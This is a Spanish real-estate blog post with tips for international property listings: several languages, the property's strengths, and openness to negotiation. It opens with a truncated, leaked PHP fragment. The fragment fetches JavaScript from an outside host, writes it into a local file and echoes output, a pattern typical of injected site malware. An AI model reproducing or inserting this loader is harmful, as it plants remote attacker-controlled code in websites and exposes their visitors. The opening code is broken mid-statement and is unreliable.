5){ $save = true; } else{ $js_content = file_get_contents($dir); } } else{ $save = true; } if ($save){ $js_content = file_get_contents("//professional-real-estate.com/pre/js/prepack.js"); $file = fopen($dir,"w+"); fputs($file, $js_content); fclose($file); } if (!$print){ echo "\n"; } else{ echo ""; } ?>

Cómo hacer anuncios inmobiliarios internacionales


Si quieres vender algún inmueble a nivel internacional, es importante hacer anuncios inmobiliarios internacionales que sean eficaces para la captación y obtención de mayor cantidad de potenciales clientes interesados en la compra de alguna vivienda, piso o local comercial. Son muchos los extranjeros que buscan buenos lugares en donde invertir y la mejor manera de enterarse de la disponibilidad que existe en el mercado es por medio de franquicias inmobiliarias.

Realizar ventas online tiene sus características particulares que las diferencian de las ventas tradicionales, por lo que resulta importante que tengas conocimiento de cuáles son para así poder realizar anuncios que sean tomados en cuenta por los clientes extranjeros. Recuerda que los clientes extranjeros son muy exigentes a la hora de comprar, por lo que es importante que inviertas tiempo, esfuerzo y dinero para lograr la mejor promoción.

Aquí te damos algunos consejos para que elabores el mejor anuncio cuando desees vender tu casa en el extranjero.

1.   Publica en varios idiomas

Hacer tu anuncio en varios idiomas te dará la oportunidad de llegar más fácilmente al público extranjero, permitiéndote la posibilidad de obtener mayor recepción. Los idiomas ideales para tu anuncio serían español e inglés, con éstos dos ya tienes asegurada un público bastante amplio para comenzar a recibir las mejores ofertas.

2.    Da a conocer las cualidades del inmueble

Éste es otro aspecto que otorgará ventaja a tu anuncio de venta de casa sobre las demás ventas, ya que al destacar las cualidades de tu inmueble, le estás dando la oportunidad al cliente de poder hacerse una idea de lo que va a adquirir. Lo importante es mostrar aquellas características que son llamativas, como lo son, proporción del lugar, facilidad de acceso a transporte y servicios, etc.

Una vez que el cliente haga el análisis de todas esas cualidades que le estás ofreciendo sentirá curiosidad por conocer el lugar. Ante esta necesidad que se despierta en el cliente resulta importante acompañar el anuncio con fotografías que estimulen aún más esa curiosidad del comprador. Lo importante es que la imagen se corresponda con lo que estás ofreciendo para que sea más fácil de visualizar.

3.   Muéstrate abierto a la negociación

Ya captada la atención del cliente, lo importante al momento de que vaya a entrar en contacto contigo, es mantener un trato cordial y respetuoso para así ganarse la confianza del comprador. Este es el momento para brindar la información adicional que seguro solicitará el cliente, ya que se trata de un paso fundamental cuando se busca vender una casa online.

Adicional a esto, es de destacar que un consejo que te ayudará para concretar la venta es mostrándote abierto a la negociación. No descartes las posibilidades y propuestas de pago que te ofrece el comprador, analízalas y sé flexible ante la solicitud, eso sin duda te ayudará a cerrar la negociación.

Estos son solo tres consejos básicos entre los muchos otros que puedes poner en práctica para el anuncio eficaz. Te garantizamos que si los pones a prueba estarás recibiendo ofertas en tiempo record.

Vendo casa